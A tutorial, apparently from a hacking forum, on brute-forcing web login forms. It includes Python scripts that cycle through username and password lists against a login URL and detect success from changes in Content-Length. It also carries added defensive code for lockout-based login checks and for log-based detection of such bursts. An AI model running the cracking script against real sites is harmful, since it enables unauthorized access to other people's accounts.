How to crack an online login form
First of all and most important, this tutorial is for educational purposes only.
It aims to help everyone who wants to know how brute-forcing practically works, so if you're not a newbie you probably won't read anything new.
For this tutorial you should already know how basic HTML tags work and what PHP does.
I know there are dozens of tools out there that do exactly the same thing as the tool we're going to code together.
However, it is crucial for your path into the world of software, networks and hacking to understand
how those tools actually work behind that nice, comfortable GUI they often offer us.
Online login forms
offer us a way to enter a private section of a website.
You access them using the login credentials you chose to be yours when you first signed up.
If you don't have any login data you can't login.
Here's what a typical login form looks like
Code:
<form action="login.php" method="POST">
<input type="text" name="username">
<input type="password" name="password">
<input type="submit" name="submit" value="login">
</form>
The data is processed by the login.php file, which checks whether you entered the right or wrong username-password combination.
Bypassing login forms
is what hackers do in order to gain access to a private section of a website by either
- exploiting database vulnerabilities to find credentials (SQL-Injection)
- session hijacking (cookie theft)
- social engineering (shoulder surfing)
- guessing the shit out of all possible passwords one could use
There are a couple of other techniques apart from those mentioned above, but we're going to focus on how to brute-force login credentials, since
it offers a great opportunity to learn about networks and protocols as you dig deeper into it.
Password crackers
mostly use dictionary attacks to guess the user's or admin's password.
They run through a list of words until they find one that matches the actual password.
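To see why a dictionary run against a real login handler is often far less effective than the word list suggests, here is an added example (my own, not part of the original tutorial) of the checks a server-side login routine typically applies: passwords are stored as salted PBKDF2 hashes and compared in constant time, every failure returns the same message, and an account that collects too many failures in a short window is refused outright. The user store, the 5-attempt / 300-second lockout policy and all helper names are this example's own assumptions, not anything from the post.

```python
# Added example (not from the original post): a minimal model of what a
# server-side login check can do against dictionary attacks. The user store,
# the 5-attempt / 300-second lockout policy and the helper names are
# hypothetical choices made for this example.
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 200_000
MAX_FAILURES = 5          # failed attempts allowed per account ...
LOCKOUT_SECONDS = 300     # ... within this window before the account is throttled
GENERIC_FAILURE = "Invalid username or password"   # identical text for every failure


def hash_password(password: str, salt: bytes = b""):
    """Salted PBKDF2-HMAC-SHA256 hash; the clear-text password is never stored."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


class LoginGuard:
    """Verifies credentials and counts failures per account."""

    def __init__(self, users: dict, clock=time.monotonic):
        self.users = users          # username -> (salt, digest)
        self.failures = {}          # username -> timestamps of recent failures
        self.clock = clock          # injectable so the policy can be tested offline

    def _recent_failures(self, username: str, now: float):
        window = [t for t in self.failures.get(username, []) if now - t < LOCKOUT_SECONDS]
        self.failures[username] = window
        return window

    def login(self, username: str, password: str):
        now = self.clock()
        if len(self._recent_failures(username, now)) >= MAX_FAILURES:
            # Locked: refuse without even checking the password, so a word list
            # gets at most MAX_FAILURES real guesses per LOCKOUT_SECONDS.
            return False, GENERIC_FAILURE
        record = self.users.get(username)
        if record is None:
            # Unknown user: spend the same hashing cost so response timing does
            # not reveal whether the username exists.
            hash_password(password, b"\x00" * 16)
            ok = False
        else:
            salt, digest = record
            ok = hmac.compare_digest(hash_password(password, salt)[1], digest)
        if not ok:
            self.failures.setdefault(username, []).append(now)
            return False, GENERIC_FAILURE
        self.failures.pop(username, None)
        return True, "Welcome"


if __name__ == "__main__":
    salt, digest = hash_password("correct horse")
    guard = LoginGuard({"admin": (salt, digest)})
    print(guard.login("admin", "12345"))          # (False, 'Invalid username or password')
    print(guard.login("admin", "correct horse"))  # (True, 'Welcome')
```

The point for the rest of this tutorial: with a handler like this, every failed attempt produces the same message and (apart from a `Set-Cookie` or redirect on success) the same body, and after a handful of failures the correct password is rejected too until the window expires, so a naive loop over a word list burns its guesses against a locked account.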
Hands on
I'm using Python because it's easy to read and understand, however I'm not a Python god.
I'm using the requests library to fire off POST requests to the web server that hosts the webpage.
Code:
import requests

payload = {'username': 'admin', 'password': '12345'}   # form fields to submit
r = requests.post("http://example.org/login.php", data=payload)
print(r.headers)   # the server's response headers
I'm importing requests, which you have to install first, then
issue a POST request to the server with the login credentials you declared in your payload;
'r.headers' returns the server's response headers.
Note that 'username' and 'password' are the names of the input tags in the login form from above.
Now we want to try different passwords and usernames and combine them, so our code needs to be rewritten to
Code:
import requests

with open("usrlist.txt", "r") as username_list:           # open file with usernames
    for x in username_list:                                # loop through them
        with open("pwlist.txt", "r") as password_list:     # open file with pws (reopened for every username)
            for y in password_list:                        # loop through them
                x = x.strip(); y = y.strip()               # cut off \n
                payload = {'username': x, 'password': y}   # set payload
                print("Trying")
                print(payload)
                r = requests.post("http://example.org/login.php", data=payload)
Now we have to find a way to signal that the right username-password combination has been found, which sometimes turns out to be fairly difficult.
One way is to fingerprint the Content-Length header of the response: first send a POST request to the server
that will definitely result in a login failure, then compare that length to the Content-Length sent back for each individual attempt.
However, if the server doesn't send a Content-Length header at all we're out of luck, so make sure it's sent back
by analyzing the server response in Wireshark first.
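The same fingerprint works in the other direction: from the server's access log, a run of this kind looks like one client sending POST after POST to the login URL and getting back a response of the same size every time. As an added example, not part of the original tutorial, here is detection logic in Python that parses Apache combined-format log lines and flags a client whose POSTs to the login URL exceed a threshold inside a sliding time window, reporting how many distinct response sizes it saw. The log lines are constructed for the example, and the threshold (20 POSTs within 60 seconds), the login path and the function names are this example's assumptions.

```python
# Added example (not from the original post): detection logic for a burst of
# login POSTs, applied to constructed Apache combined-log lines. The thresholds,
# the login path and the function names are this example's assumptions.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
LOGIN_PATH = "/login.php"
THRESHOLD = 20        # POSTs to the login URL ...
WINDOW_SECONDS = 60   # ... within this many seconds from one client


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status, size) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    size = 0 if m["size"] == "-" else int(m["size"])
    return m["ip"], ts, m["method"], m["path"], int(m["status"]), size


def find_bruteforce(lines):
    """Return {ip: (max_posts_in_window, distinct_response_sizes)} for clients over the threshold.

    A single response size repeated over and over is the signature the
    Content-Length trick relies on: every failed login looks identical."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status, size = rec
        if method == "POST" and path == LOGIN_PATH:
            per_ip[ip].append((ts, size))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        start, best = 0, 0
        for end in range(len(events)):           # sliding window over timestamps
            while (events[end][0] - events[start][0]).total_seconds() > WINDOW_SECONDS:
                start += 1
            best = max(best, end - start + 1)
        if best >= THRESHOLD:
            flagged[ip] = (best, {s for _, s in events})
    return flagged


def sample_log():
    """Constructed log lines: one client hammering /login.php, one ordinary user, one junk line."""
    lines = [
        f'203.0.113.7 - - [10/Oct/2023:13:55:{i:02d} +0000] "POST /login.php HTTP/1.1" 200 1432 "-" "python-requests/2.31"'
        for i in range(25)
    ]
    lines.append('198.51.100.4 - - [10/Oct/2023:13:55:10 +0000] "GET /login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"')
    lines.append('198.51.100.4 - - [10/Oct/2023:13:55:31 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append('garbage line that does not parse')
    return lines


if __name__ == "__main__":
    for ip, (count, sizes) in find_bruteforce(sample_log()).items():
        print(f"{ip}: {count} login POSTs in {WINDOW_SECONDS}s, response sizes seen: {sorted(sizes)}")
```

On the constructed input only 203.0.113.7 is flagged: 25 POSTs inside the window, all answered with the same 1432-byte body, while the ordinary user's single POST is ignored. In a real deployment the same rule is what a web application firewall or fail2ban-style filter applies before an IP ban or a CAPTCHA kicks in.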
Here's what a very simple password cracker script in python might look like
Code:
import sys
import requests

# bullshit request: a combo that is certain to fail, so we learn the size of a failure response
payload = {'username': 'kkchicka', 'password': 'kkchicka'}
g = requests.post("http://example.org/login.php", data=payload)
failure_length = int(g.headers['Content-length'])

with open("usrlist.txt", "r") as username_list:
    for x in username_list:
        with open("pwlist.txt", "r") as password_list:
            for y in password_list:
                x = x.strip(); y = y.strip()
                payload = {'username': x, 'password': y}
                print("[!] Trying")
                print(payload)
                r = requests.post("http://example.org/login.php", data=payload)
                # a response of a different size than the known failure means the login page did something else
                if int(r.headers['Content-length']) != failure_length:
                    print("Password found!")
                    sys.exit()